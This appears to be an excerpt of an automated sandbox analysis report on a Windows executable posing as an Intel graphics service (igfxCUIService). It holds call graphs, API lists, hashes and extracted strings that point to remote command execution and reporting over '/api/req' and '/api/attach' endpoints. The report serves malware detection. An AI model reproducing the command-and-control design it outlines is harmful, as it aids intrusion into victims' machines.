33223->33200 33224->33223 33226 d348e7 33224->33226 33268 d427bf EnterCriticalSection LeaveCriticalSection std::_Facet_Register 33224->33268 33269 d4274c 15 API calls 2 library calls 33224->33269 33227 d121c0 Concurrency::cancel_current_task 33226->33227 33229 d348f1 std::_Facet_Register 33226->33229 33266 d3731a RaiseException 33227->33266 33270 d3731a RaiseException 33229->33270 33230 d121dc 33267 d36b4e 26 API calls ___std_exception_copy 33230->33267 33233 d35006 33234 d12203 33234->33200 33236 d35782 __EH_prolog3 33235->33236 33271 d35428 33236->33271 33241 d357a0 33283 d358fe 33241->33283 33242 d357fe std::locale::_Init 33242->33202 33246 d357be 33287 d35480 33246->33287 33248 d35428 std::_Lockit::_Lockit 7 API calls 33247->33248 33249 d29cf5 33248->33249 33250 d35428 std::_Lockit::_Lockit 7 API calls 33249->33250 33255 d29d37 33249->33255 33251 d29d17 33250->33251 33253 d35480 std::_Lockit::~_Lockit 2 API calls 33251->33253 33252 d35480 std::_Lockit::~_Lockit 2 API calls 33254 d288d3 33252->33254 33253->33255 33254->33205 33254->33206 33256 d29d7f 33255->33256 33257 d348c6 std::_Facet_Register 27 API calls 33255->33257 33256->33252 33258 d29d8a 33257->33258 33317 d12850 96 API calls 2 library calls 33258->33317 33260 d29dba 33318 d35b6f 71 API calls __Getctype 33260->33318 33262 d29dd0 33319 d12900 96 API calls 3 library calls 33262->33319 33264 d29de2 33320 d35744 27 API calls std::_Facet_Register 33264->33320 33266->33230 33267->33234 33268->33224 33269->33224 33270->33233 33272 d35437 33271->33272 33273 d3543e 33271->33273 33295 d4535a 6 API calls std::_Lockit::_Lockit 33272->33295 33276 d3543c 33273->33276 33296 d35dfb EnterCriticalSection 33273->33296 33276->33246 33277 d358db 33276->33277 33278 d348c6 std::_Facet_Register 27 API calls 33277->33278 33279 d358e6 33278->33279 33280 d358fa 33279->33280 33297 d3560a 15 API calls _Yarn 33279->33297 33280->33241 33282 d358f8 33282->33241 33284 d3590a 33283->33284 33286 d357a8 33283->33286 33298 d35e7f 33284->33298 33294 d356ce 15 API calls 2 library calls 33286->33294 33288 d3548a 33287->33288 33289 d45368 33287->33289 33290 d3549d 33288->33290 33315 d35e09 LeaveCriticalSection 33288->33315 33316 d45343 LeaveCriticalSection 33289->33316 33290->33242 33293 d4536f 33293->33242 33294->33246 33295->33276 33296->33276 33297->33282 33299 d35e8f RtlEncodePointer 33298->33299 33300 d45e99 33298->33300 33299->33286 33311 d4c33d EnterCriticalSection LeaveCriticalSection __purecall 33300->33311 33302 d45e9e 33303 d45eaa 33302->33303 33312 d4c38b 71 API calls 7 library calls 33302->33312 33305 d45ed2 33303->33305 33306 d45eb3 IsProcessorFeaturePresent 33303->33306 33314 d42c1f 71 API calls __purecall 33305->33314 33307 d45ebf 33306->33307 33313 d41195 8 API calls 2 library calls 33307->33313 33310 d45edc 33311->33302 33312->33303 33313->33305 33314->33310 33315->33290 33316->33293 33317->33260 33318->33262 33319->33264 33320->33256 33323 d35a7e 33321->33323 33322 d2699c 33322->33213 33327 d267a0 25 API calls 33322->33327 33323->33322 33326 d35ae6 33323->33326 33329 d42600 97 API calls 33323->33329 33325 d40ee6 100 API calls 33325->33322 33326->33322 33326->33325 33327->33218 33328->33220 33329->33326 33331 d2f21d 33330->33331 33338 d32150 33331->33338 33333 d12bd0 27 API calls 33334 d2a59d 33333->33334 33334->33005 33335 d2f299 33335->33333 33337 d2f231 33337->33335 33345 d27c10 27 API calls 2 library calls 33337->33345 33339 d32182 33338->33339 33341 d321b0 33338->33341 33340 d12bd0 27 API calls 33339->33340 33343 d3219c 33340->33343 33342 d321bc 33341->33342 33346 d32000 27 API calls 33341->33346 33342->33337 33343->33337 33345->33337 33346->33342 33348 d2678a 33347->33348 33349 d266ed 33347->33349 33350 d344d0 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 33348->33350 33349->33348 33354 d266f7 33349->33354 33351 d26797 33350->33351 33351->33150 33352 d26778 33353 d344d0 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 33352->33353 33355 d26786 33353->33355 33354->33352 33356 d26726 33354->33356 33359 d26740 33354->33359 33355->33150 33356->33352 33357 d2672b 33356->33357 33360 d344d0 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 33357->33360 33358 d26761 33362 d344d0 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 33358->33362 33359->33358 33366 d4177b 97 API calls 2 library calls 33359->33366 33364 d2673c 33360->33364 33363 d26774 33362->33363 33363->33150 33364->33150 33365 d2675a 33365->33352 33365->33358 33366->33365 33367->33155 33368->33156 33369->33163 33370->33165 33371->33168 33372->33165 33373->33162 33374->33171 33375->33183 33376->33185 33377->33187 33378->33189 33380 d16a45 33379->33380 33400 d25e20 27 API calls 3 library calls 33380->33400 33382 d16a84 33385 d16b8e 33382->33385 33401 d347ec 5 API calls ___report_securityfailure 33382->33401 33384 d16c5e 33385->33016 33385->33017 33387 d16689 33386->33387 33402 d26060 33387->33402 33389 d167f0 error_info_injector 33390 d344d0 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 33389->33390 33391 d16814 33390->33391 33391->33024 33392 d1681a 33411 d41351 25 API calls 2 library calls 33392->33411 33394 d1669e 33394->33389 33394->33392 33396->33021 33398->33027 33400->33382 33401->33384 33403 d26080 ___scrt_fastfail 33402->33403 33404 d2609e 33402->33404 33403->33394 33405 d260a6 33404->33405 33406 d260f9 33404->33406 33412 d28b10 27 API calls 2 library calls 33405->33412 33413 d12260 33406->33413 33410 d260d0 ___scrt_fastfail 33410->33394 33412->33410 33416 d355a4 27 API calls 2 library calls 33413->33416 33417->33048 33418->33046 33430 d47d3d 33419->33430 33422->33065 33423->33061 33424->33073 33425->33070 33426->33076 33427->33070 33428->33059 33429->33063 33431 d40fc6 33430->33431 33432 d47d5a 33430->33432 33431->33056 33432->33431 33434 d53266 GetStringTypeW 33432->33434 33434->33431 33435->33084 33437 d26d50 33436->33437 33440 d26d59 33436->33440 33437->33091 33439 d26ea6 33441 d26dcc __Getctype 33440->33441 33442 d26da7 33440->33442 33443 d26dbd 33440->33443 33460 d26e94 33440->33460 33453 d26e80 33441->33453 33454 d26dbb WideCharToMultiByte 33441->33454 33472 d3c962 28 API calls 2 library calls 33442->33472 33473 d41d58 14 API calls _free 33443->33473 33447 d26db0 33451 d26e76 33447->33451 33447->33454 33448 d26e15 GetLastError 33449 d26e20 WideCharToMultiByte 33448->33449 33450 d26e66 33448->33450 33474 d2ae70 30 API calls 2 library calls 33449->33474 33452 d26e6d 33450->33452 33477 d2aae0 14 API calls ___std_exception_copy 33450->33477 33475 d13ea0 GetLastError RaiseException Concurrency::cancel_current_task 33451->33475 33452->33091 33476 d13ea0 GetLastError RaiseException Concurrency::cancel_current_task 33453->33476 33454->33448 33454->33450 33459 d26e44 WideCharToMultiByte 33459->33450 33478 d13ea0 GetLastError RaiseException Concurrency::cancel_current_task 33460->33478 33464 d27d36 __InternalCxxFrameHandler 33461->33464 33465 d27d5e 33461->33465 33462 d27e07 33463 d12260 27 API calls 33462->33463 33466 d27e0c 33463->33466 33464->33093 33465->33462 33479 d28b10 27 API calls 2 library calls 33465->33479 33468 d27da7 _Yarn 33469 d27de9 error_info_injector 33468->33469 33480 d41351 25 API calls 2 library calls 33468->33480 33469->33093 33471->33094 33472->33447 33473->33454 33474->33459 33475->33453 33476->33450 33477->33460 33478->33439 33479->33468 33481 d344e6 33492 d3450d InitializeCriticalSectionAndSpinCount GetModuleHandleW 33481->33492 33483 d344eb 33503 d349a5 4 API calls 2 library calls 33483->33503 33485 d344f2 33486 d344f7 33485->33486 33487 d34505 33485->33487 33504 d34b32 28 API calls 33486->33504 33505 d34dd5 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 33487->33505 33490 d34501 33491 d3450c 33493 d34541 GetProcAddress GetProcAddress 33492->33493 33494 d34530 GetModuleHandleW 33492->33494 33496 d34571 CreateEventW 33493->33496 33497 d3455f 33493->33497 33494->33493 33495 d34587 33494->33495 33506 d34dd5 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 33495->33506 33496->33495 33498 d34563 33496->33498 33497->33496 33497->33498 33498->33483 33500 d3458e DeleteCriticalSection 33501 d345a3 CloseHandle 33500->33501 33502 d345aa 33500->33502 33501->33502 33502->33483 33503->33485 33504->33490 33505->33491 33506->33500 33507 d48e5d 33512 d48bf2 33507->33512 33510 d48e9c 33517 d48c20 ___vcrt_FlsFree 33512->33517 33514 d48e4b 33531 d41341 25 API calls __strnicoll 33514->33531 33516 d48d7b 33516->33510 33524 d542a4 33516->33524 33522 d48d70 33517->33522 33527 d41f2f 72 API calls 2 library calls 33517->33527 33519 d48dd8 33519->33522 33528 d41f2f 72 API calls 2 library calls 33519->33528 33521 d48df6 33521->33522 33529 d41f2f 72 API calls 2 library calls 33521->33529 33522->33516 33530 d41857 14 API calls _free 33522->33530 33532 d539ad 33524->33532 33527->33519 33528->33521 33529->33522 33530->33514 33531->33516 33535 d539b9 __FrameHandler3::FrameUnwindToState 33532->33535 33533 d539c0 33590 d41857 14 API calls _free 33533->33590 33535->33533 33537 d539eb 33535->33537 33536 d539c5 33591 d41341 25 API calls __strnicoll 33536->33591 33543 d53f7a 33537->33543 33542 d539cf 33542->33510 33593 d53d56 33543->33593 33546 d53fc5 33611 d4c8f7 33546->33611 33547 d53fac 33625 d41844 14 API calls _free 33547->33625 33551 d53fd3 33627 d41844 14 API calls _free 33551->33627 33552 d53fea 33624 d53cc1 CreateFileW 33552->33624 33556 d53a0f 33592 d53a42 LeaveCriticalSection __wsopen_s 33556->33592 33557 d53fd8 33628 d41857 14 API calls _free 33557->33628 33559 d54023 33560 d540a0 GetFileType 33559->33560 33562 d54075 GetLastError 33559->33562 33629 d53cc1 CreateFileW 33559->33629 33563 d540f2 33560->33563 33564 d540ab GetLastError 33560->33564 33561 d53fb1 33626 d41857 14 API calls _free 33561->33626 33630 d41821 14 API calls 2 library calls 33562->33630 33633 d4c842 15 API calls 3 library calls 33563->33633 33631 d41821 14 API calls 2 library calls 33564->33631 33567 d540b9 CloseHandle 33567->33561 33569 d540e2 33567->33569 33632 d41857 14 API calls _free 33569->33632 33571 d54068 33571->33560 33571->33562 33573 d54113 33575 d5415f 33573->33575 33634 d53ed0 103 API calls 4 library calls 33573->33634 33574 d540e7 33574->33561 33580 d54166 33575->33580 33635 d53a6e 103 API calls 4 library calls 33575->33635 33578 d54194 33579 d541a2 33578->33579 33578->33580 33579->33556 33582 d5421e CloseHandle 33579->33582 33581 d49118 __wsopen_s 28 API calls 33580->33581 33581->33556 33636 d53cc1 CreateFileW 33582->33636 33584 d54249 33585 d5427f 33584->33585 33586 d54253 GetLastError 33584->33586 33585->33556 33637 d41821 14 API calls 2 library calls 33586->33637 33588 d5425f 33638 d4ca0a 15 API calls 3 library calls 33588->33638 33590->33536 33591->33542 33592->33542 33594 d53d77 33593->33594 33595 d53d91 33593->33595 33594->33595 33646 d41857 14 API calls _free 33594->33646 33639 d53ce6 33595->33639 33598 d53d86 33647 d41341 25 API calls __strnicoll 33598->33647 33600 d53dc9 33601 d53df8 33600->33601 33648 d41857 14 API calls _free 33600->33648 33608 d53e4b 33601->33608 33650 d43960 25 API calls 2 library calls 33601->33650 33604 d53e46 33606 d53ec3 33604->33606 33604->33608 33605 d53ded 33649 d41341 25 API calls __strnicoll 33605->33649 33651 d4136e 11 API calls __purecall 33606->33651 33608->33546 33608->33547 33610 d53ecf 33612 d4c903 __FrameHandler3::FrameUnwindToState 33611->33612 33654 d452fb EnterCriticalSection 33612->33654 33615 d4c90a 33616 d4c92f 33615->33616 33620 d4c99e EnterCriticalSection 33615->33620 33623 d4c951 33615->33623 33658 d4c6d1 33616->33658 33622 d4c9ab LeaveCriticalSection 33620->33622 33620->33623 33622->33615 33655 d4ca01 33623->33655 33624->33559 33625->33561 33626->33556 33627->33557 33628->33561 33629->33571 33630->33561 33631->33567 33632->33574 33633->33573 33634->33575 33635->33578 33636->33584 33637->33588 33638->33585 33641 d53cfe 33639->33641 33640 d53d19 33640->33600 33641->33640 33652 d41857 14 API calls _free 33641->33652 33643 d53d3d 33653 d41341 25 API calls __strnicoll 33643->33653 33645 d53d48 33645->33600 33646->33598 33647->33595 33648->33605 33649->33601 33650->33604 33651->33610 33652->33643 33653->33645 33654->33615 33666 d45343 LeaveCriticalSection 33655->33666 33657 d4c971 33657->33551 33657->33552 33659 d46876 _free 14 API calls 33658->33659 33660 d4c6e3 33659->33660 33664 d4c6f0 33660->33664 33667 d49972 6 API calls _free 33660->33667 33663 d4c745 33663->33623 33665 d4c81f EnterCriticalSection 33663->33665 33668 d468d3 14 API calls _free 33664->33668 33665->33623 33666->33657 33667->33660 33668->33663 33669 d4300f 33678 d4be03 GetEnvironmentStringsW 33669->33678 33674 d43032 33686 d468d3 14 API calls _free 33674->33686 33675 d43056 33677 d43027 33687 d468d3 14 API calls _free 33677->33687 33679 d4be17 33678->33679 33680 d43021 33678->33680 33681 d4690d __strnicoll 15 API calls 33679->33681 33680->33677 33685 d4312c 25 API calls 2 library calls 33680->33685 33682 d4be2b _Yarn 33681->33682 33688 d468d3 14 API calls _free 33682->33688 33684 d4be45 FreeEnvironmentStringsW 33684->33680 33685->33674 33686->33677 33687->33675 33688->33684 33689 d34c4f 33690 d34c5b __FrameHandler3::FrameUnwindToState 33689->33690 33717 d3496c 33690->33717 33692 d34c62 33693 d34db5 33692->33693 33698 d34c8c 33692->33698 33751 d34dd5 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 33693->33751 33695 d34dbc 33752 d42c5b 71 API calls __purecall 33695->33752 33697 d34dc2 33753 d42c1f 71 API calls __purecall 33697->33753 33701 d34cab 33698->33701 33706 d34ccb ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 33698->33706 33728 d438ed 33698->33728 33700 d34dca 33703 d34d2c 33732 d34eef 33703->33732 33705 d34d32 33736 d21330 33705->33736 33706->33703 33747 d42c35 71 API calls 4 library calls 33706->33747 33711 d34d4e 33711->33695 33712 d34d52 33711->33712 33713 d34d5b 33712->33713 33749 d42c10 71 API calls __purecall 33712->33749 33750 d34add 106 API calls ___scrt_uninitialize_crt 33713->33750 33716 d34d63 33716->33701 33718 d34975 33717->33718 33754 d35007 IsProcessorFeaturePresent 33718->33754 33720 d34981 33755 d37186 10 API calls 2 library calls 33720->33755 33722 d34986 33727 d3498a 33722->33727 33756 d437de 33722->33756 33725 d349a1 33725->33692 33727->33692 33729 d4392d 33728->33729 33730 d43911 33728->33730 33729->33706 33730->33729 33797 d111f0 33730->33797 33971 d371c0 33732->33971 33734 d34f02 GetStartupInfoW 33735 d34f15 33734->33735 33735->33705 33738 d21380 33736->33738 33737 d3c92f 71 API calls 33737->33738 33738->33737 33739 d3c92f 71 API calls 33738->33739 33741 d213b7 33738->33741 33740 d213a0 SleepEx 33739->33740 33740->33738 33742 d3c92f 71 API calls 33741->33742 33743 d213bc SleepEx CreateDirectoryW 33742->33743 33744 d213e2 33743->33744 33745 d344d0 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 33744->33745 33746 d21400 33745->33746 33748 d34f25 GetModuleHandleW 33746->33748 33747->33703 33748->33711 33749->33713 33750->33716 33751->33695 33752->33697 33753->33700 33754->33720 33755->33722 33760 d4c1d6 33756->33760 33759 d371a5 7 API calls 2 library calls 33759->33727 33761 d4c1e6 33760->33761 33762 d34993 33760->33762 33761->33762 33764 d467ea 33761->33764 33762->33725 33762->33759 33765 d467f6 __FrameHandler3::FrameUnwindToState 33764->33765 33776 d452fb EnterCriticalSection 33765->33776 33767 d467fd 33777 d4c781 33767->33777 33769 d4681b 33792 d46841 LeaveCriticalSection std::_Lockit::~_Lockit 33769->33792 33773 d46816 33791 d46736 GetStdHandle GetFileType 33773->33791 33774 d4682c 33774->33761 33776->33767 33778 d4c78d __FrameHandler3::FrameUnwindToState 33777->33778 33779 d4c796 33778->33779 33780 d4c7b7 33778->33780 33794 d41857 14 API calls _free 33779->33794 33793 d452fb EnterCriticalSection 33780->33793 33783 d4c79b 33795 d41341 25 API calls __strnicoll 33783->33795 33786 d4c6d1 __wsopen_s 15 API calls 33788 d4c7c3 33786->33788 33787 d4680c 33787->33769 33790 d46680 28 API calls 33787->33790 33788->33786 33789 d4c7ef 33788->33789 33796 d4c816 LeaveCriticalSection std::_Lockit::~_Lockit 33789->33796 33790->33773 33791->33769 33792->33774 33793->33788 33794->33783 33795->33787 33796->33787 33945 d42707 33797->33945 33800 d140f0 40 API calls 33801 d11227 33800->33801 33802 d11278 33801->33802 33803 d1122d 33801->33803 33959 d13ea0 GetLastError RaiseException Concurrency::cancel_current_task 33802->33959 33806 d27040 37 API calls 33803->33806 33805 d11282 33960 d28b10 27 API calls 2 library calls 33805->33960 33808 d1124c 33806->33808 33810 d1125b 33808->33810 33812 d25750 29 API calls 33808->33812 33809 d112d8 33961 d173a0 28 API calls 3 library calls 33809->33961 33958 d34b32 28 API calls 33810->33958 33812->33810 33814 d112fe 33816 d140f0 40 API calls 33814->33816 33815 d11265 33815->33730 33817 d11317 33816->33817 33818 d113d8 33817->33818 33820 d11321 33817->33820 33964 d13ea0 GetLastError RaiseException Concurrency::cancel_current_task 33818->33964 33822 d27040 37 API calls 33820->33822 33821 d113e2 33965 d41351 25 API calls 2 library calls 33821->33965 33824 d1133b 33822->33824 33826 d11348 33824->33826 33828 d25750 29 API calls 33824->33828 33962 d24f70 42 API calls 33826->33962 33828->33826 33833 d113a7 error_info_injector 33963 d34b32 28 API calls 33833->33963 33834 d1135f 33834->33821 33834->33833 33838 d113bb 33841 d344d0 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 33838->33841 33842 d113d4 33841->33842 33842->33730 33946 d4261b __FrameHandler3::FrameUnwindToState 33945->33946 33947 d4262e 33946->33947 33951 d42654 33946->33951 33966 d41857 14 API calls _free 33947->33966 33949 d42633 33967 d41341 25 API calls __strnicoll 33949->33967 33968 d452fb EnterCriticalSection 33951->33968 33952 d1121d 33952->33800 33954 d4265f 33969 d4269a 71 API calls __strnicoll 33954->33969 33956 d4266a 33970 d42691 LeaveCriticalSection std::_Lockit::~_Lockit 33956->33970 33958->33815 33959->33805 33960->33809 33961->33814 33962->33834 33963->33838 33964->33821 33966->33949 33967->33952 33968->33954 33969->33956 33970->33952 33971->33734 33972 d34c3d 33977 d34f68 SetUnhandledExceptionFilter 33972->33977 33974 d34c42 33978 d451ea 25 API calls 2 library calls 33974->33978 33976 d34c4d 33977->33974 33978->33976

                                  Executed Functions

                                  Function 00D34F68, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetUnhandledExceptionFilter.KERNELBASE(00D34F74,00D34C42), ref: 00D34F6D
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: 1416536697ec8dced1cf9c97badba0f08851010c972df474784e62b3b095adf3
                                  • Instruction ID: bd7815238d3f4f0a98c2ed8b53a63e3f7debd7a8350f101fc2f22f657bd09d47
                                  • Opcode Fuzzy Hash: 1416536697ec8dced1cf9c97badba0f08851010c972df474784e62b3b095adf3
                                  • Instruction Fuzzy Hash:
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 00D1EEF0, Relevance: 70.7, APIs: 5, Strings: 35, Instructions: 656memoryfileUNIQUE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 d1eef0-d1ef41 call d1a230 3 d1ef43 0->3 4 d1ef45-d1ef4e call d140f0 0->4 3->4 7 d1f725-d1f72a call d13ea0 4->7 8 d1ef54-d1ef6e call d27040 4->8 10 d1f72f call d41351 7->10 17 d1ef70-d1ef74 call d25750 8->17 18 d1ef79-d1ef83 8->18 14 d1f734-d1f739 call d13ea0 10->14 19 d1f73e-d1f743 call d13ea0 14->19 17->18 21 d1efb1-d1efcc call d140f0 18->21 22 d1ef85-d1ef91 18->22 29 d1f748-d1f74d call d13ea0 19->29 21->14 32 d1efd2-d1eff0 call d27040 21->32 23 d1ef93-d1efa1 22->23 24 d1efa7-d1efae call d34b47 22->24 23->10 23->24 24->21 33 d1f752 call d272b0 29->33 41 d1eff2-d1effa call d25750 32->41 42 d1efff-d1f02c call d24f70 32->42 36 d1f757 call d272b0 33->36 40 d1f75c 36->40 43 d1f761-d1f766 call d41351 40->43 44 d1f75c call d41351 40->44 41->42 49 d1f036-d1f03f call d140f0 42->49 50 d1f02e-d1f031 42->50 44->43 49->19 54 d1f045-d1f063 call d27040 49->54 50->49 58 d1f072-d1f0b7 call d24f70 * 2 54->58 59 d1f065-d1f06d call d25750 54->59 65 d1f0c1-d1f0d5 58->65 66 d1f0b9-d1f0bc 58->66 59->58 67 d1f0d7-d1f0da 65->67 68 d1f0df-d1f0e8 call d140f0 65->68 66->65 67->68 68->29 71 d1f0ee-d1f10c call d27040 68->71 75 d1f11b-d1f160 call d24f70 * 2 71->75 76 d1f10e-d1f116 call d25750 71->76 82 d1f162-d1f165 75->82 83 d1f16a-d1f17e 75->83 76->75 82->83 84 d1f180-d1f183 83->84 85 d1f188-d1f19b CreateDirectoryW 83->85 84->85 86 d1f1a0-d1f1a6 85->86 87 d1f1c6-d1f1c8 86->87 88 d1f1a8-d1f1ab 86->88 89 d1f1cb-d1f1cd 87->89 90 d1f1c2-d1f1c4 88->90 91 d1f1ad-d1f1b5 88->91 92 d1f1d3-d1f22c call d25870 call d28500 * 2 call d176a0 89->92 93 d1f49e-d1f4b2 89->93 90->89 91->87 94 d1f1b7-d1f1c0 91->94 125 d1f551-d1f565 92->125 126 d1f232-d1f245 SysAllocStringLen 92->126 95 d1f4b4-d1f4b7 93->95 96 d1f4bc-d1f4d0 93->96 94->86 94->90 95->96 99 d1f4d2-d1f4d5 96->99 100 d1f4da-d1f4ee 96->100 99->100 102 d1f4f0-d1f4f3 100->102 103 d1f4f8-d1f50c 100->103 102->103 105 d1f516-d1f520 103->105 106 d1f50e-d1f511 103->106 108 d1f526-d1f532 105->108 109 d1f63f-d1f665 105->109 106->105 110 d1f635-d1f63c call d34b47 108->110 111 d1f538-d1f546 108->111 113 d1f667-d1f66a 109->113 114 d1f66f-d1f684 109->114 110->109 111->40 115 d1f54c 111->115 113->114 116 d1f686-d1f689 114->116 117 d1f68e-d1f690 114->117 115->110 116->117 120 d1f707 117->120 121 d1f709-d1f724 call d344d0 117->121 120->121 127 d1f567-d1f56a 125->127 128 d1f56f-d1f583 125->128 126->33 130 d1f24b-d1f256 SysAllocStringLen 126->130 127->128 131 d1f585-d1f588 128->131 132 d1f58d-d1f5a1 128->132 130->36 133 d1f25c-d1f267 call d1ec90 130->133 131->132 134 d1f5a3-d1f5a6 132->134 135 d1f5ab-d1f5bf 132->135 140 d1f269-d1f288 call d3c92f SleepEx DeleteFileW 133->140 141 d1f28e-d1f2ae call d28500 call d1eb40 133->141 134->135 138 d1f5c1-d1f5c4 135->138 139 d1f5c9-d1f5dd 135->139 138->139 142 d1f5e7-d1f603 call d25f90 139->142 143 d1f5df-d1f5e2 139->143 140->141 141->125 155 d1f2b4-d1f2b8 141->155 150 d1f605-d1f608 142->150 151 d1f60d-d1f622 142->151 143->142 150->151 151->120 153 d1f628-d1f630 151->153 153->120 157 d1f480-d1f494 155->157 158 d1f2be-d1f2c8 call d24f30 155->158 157->93 159 d1f496-d1f499 157->159 158->157 162 d1f2ce-d1f30b call d37a10 call d173a0 158->162 159->93 167 d1f30d 162->167 168 d1f30f-d1f361 call d25870 call d25f90 call d37a10 call d173a0 162->168 167->168 177 d1f363 168->177 178 d1f365-d1f45a call d25870 call d25f90 call d25870 * 2 call d24f70 * 3 call d25850 * 4 call d28500 * 2 call d19ce0 168->178 177->178 206 d1f45f-d1f47b call d25850 * 3 178->206 206->157
                                  APIs
                                  • CreateDirectoryW.KERNEL32(?,00000000,?,00D66C58,?,00D66C58), ref: 00D1F18D
                                  • SysAllocStringLen.OLEAUT32(?,?), ref: 00D1F23F
                                  • SysAllocStringLen.OLEAUT32(?,?), ref: 00D1F252
                                  • SleepEx.KERNEL32(?,00000000,?,?,?,00D66C58,?,00D66C58), ref: 00D1F27F
                                  • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,00D66C58,?,00D66C58), ref: 00D1F288
                                    • Part of subcall function 00D19CE0: ShellExecuteExW.SHELL32(?), ref: 00D19D3A
                                    • Part of subcall function 00D19CE0: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00D19D45
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocString$CreateDeleteDirectoryExecuteFileObjectShellSingleSleepWait
                                  • String ID: > "$" /F$' '$.zip$/api/attach$/api/req$/c $4$IjkiCA==$Pj0mFDk=$Yyw/Aw==$\txc1.txt$\txc1.txt" && type "$\txc1.txt" > "$\txc2.txt$\txc2.txt"$cannot get value$cannot use operator[] with a numeric argument with $cannot use operator[] with a string argument with $cmd$command$data$dir$exe$exit$name$remove_reg$request$ss"}$tion"}$token=$type$url$y '${"status":"success","result":"
                                  • API String ID: 2258598679-1644749762
                                  • Opcode ID: faedbab76891777c11ab4363b5f8cc14fa9d84ebe34e7a3f1daea47566e3631c
                                  • Instruction ID: db3c28ed8310231d028189fa095ab271f6af9abf49055d30897ac0cd2b63beef
                                  • Opcode Fuzzy Hash: faedbab76891777c11ab4363b5f8cc14fa9d84ebe34e7a3f1daea47566e3631c
                                  • Instruction Fuzzy Hash: EE42B130900649DBEB10DF68D845B9DFBB5EF55318F1882A8E4059B292EF349D45CBB1
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00D3450D, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 51libraryloaderUNIQUE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 212 d3450d-d3452e InitializeCriticalSectionAndSpinCount GetModuleHandleW 213 d34541-d3455d GetProcAddress * 2 212->213 214 d34530-d3453f GetModuleHandleW 212->214 216 d34571-d34585 CreateEventW 213->216 217 d3455f-d34561 213->217 214->213 215 d34587-d345a1 call d34dd5 DeleteCriticalSection 214->215 222 d345a3-d345a4 CloseHandle 215->222 223 d345aa 215->223 216->215 219 d3456e-d34570 216->219 217->216 218 d34563-d34569 217->218 218->219 222->223
                                  APIs
                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(00D6F1D8,00000FA0,?,?,00D344EB), ref: 00D34519
                                  • GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,00D344EB), ref: 00D34524
                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00D344EB), ref: 00D34535
                                  • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00D34547
                                  • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00D34555
                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00D344EB), ref: 00D34578
                                  • ___scrt_fastfail.LIBCMT ref: 00D34589
                                  • DeleteCriticalSection.KERNEL32(00D6F1D8,00000007,?,?,00D344EB), ref: 00D34594
                                  • CloseHandle.KERNEL32(00000000,?,?,00D344EB), ref: 00D345A4
                                  Strings
                                  • kernel32.dll, xrefs: 00D34530
                                  • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00D3451F
                                  • SleepConditionVariableCS, xrefs: 00D34541
                                  • WakeAllConditionVariable, xrefs: 00D3454D
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
